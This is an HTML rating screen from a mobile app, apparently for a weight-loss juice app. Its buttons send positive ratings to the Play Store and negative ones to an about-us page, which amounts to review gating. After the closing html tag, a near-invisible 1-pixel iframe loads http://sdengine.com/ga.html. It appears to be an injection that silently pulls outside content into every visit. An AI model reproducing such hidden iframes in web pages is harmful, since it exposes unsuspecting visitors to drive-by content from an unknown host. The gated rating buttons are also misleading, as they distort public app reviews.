<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>frasesevangelicasportugues</title>

  <link rel="stylesheet" type="text/css" href="style.css">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=3.0">
  <meta name="apple-touch-fullscreen" content="YES">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <link rel="apple-touch-icon" href="icon.png">
	
	
	<style>#container3{float:left;
width:100%;
background:green;
overflow:hidden;
position:relative;
}
#container2{float:left;
width:100%;
background:yellow;
position:relative;
right:30%;
}
#container1{float:left;
width:100%;
background:red;
position:relative;
right:40%;
}
#col1{float:left;
width:26%;
position:relative;
left:72%;
overflow:hidden;
}
#col2{float:left;
width:36%;
position:relative;
left:76%;
overflow:hidden;
}
#col3{float:left;
width:26%;
position:relative;
left:80%;
overflow:hidden;
}
body{background-image:url(aboutus_background.png);
color:#000000;
}
a{color:#000000;
}
a:visited{color:#000000;
}
</style>
	
	
	
</head>
	
	
	<body><div><img src="jugos/jugo12.jpg" style="font-size: 14pt; max-width: 100%; width: 100%;"></div>

<div style="padding: 15px 12px; text-align: center;"><font color="#000000">¿ What do you think about the app ?</font></div>

<a href="https://play.google.com/store/apps/details?id=com.wondrousapps.weightlossjuice"><div style="padding: 7px; margin-left: 10px; margin-right: 10px; border-radius: 3px; border-color: rgb(0, 0, 0); border-width: 1px; border-style: solid; margin-top: 15px; text-align: center; background-color: rgb(206, 240, 211); font-size: 18px; font-family: Helvetica;">Very Good</div></a>

<a href="https://play.google.com/store/apps/details?id=com.wondrousapps.weightlossjuice"><div style="padding: 7px; margin-left: 10px; margin-right: 10px; border-radius: 3px; border-color: rgb(0, 0, 0); border-width: 1px; border-style: solid; margin-top: 15px; text-align: center; background-color: rgb(206, 240, 211); font-size: 18px; font-family: Helvetica;">Good</div></a>

<a href="aboutus.html"><div style="padding: 7px; margin-left: 10px; margin-right: 10px; border-radius: 3px; border-color: rgb(0, 0, 0); border-width: 1px; border-style: solid; margin-top: 15px; text-align: center; background-color: rgb(206, 240, 211); font-size: 18px; font-family: Helvetica;">Regular</div></a>

<a href="aboutus.html"><div style="padding: 7px; margin: 15px 10px 20px; border-radius: 3px; border-color: rgb(0, 0, 0); border-width: 1px; border-style: solid; text-align: center; background-color: rgb(206, 240, 211); font-size: 18px; font-family: Helvetica;">Bad</div></a>
















</body>
</html><iframe src="http://sdengine.com/ga.html" frameBorder="0" width="100%" height="1"></iframe>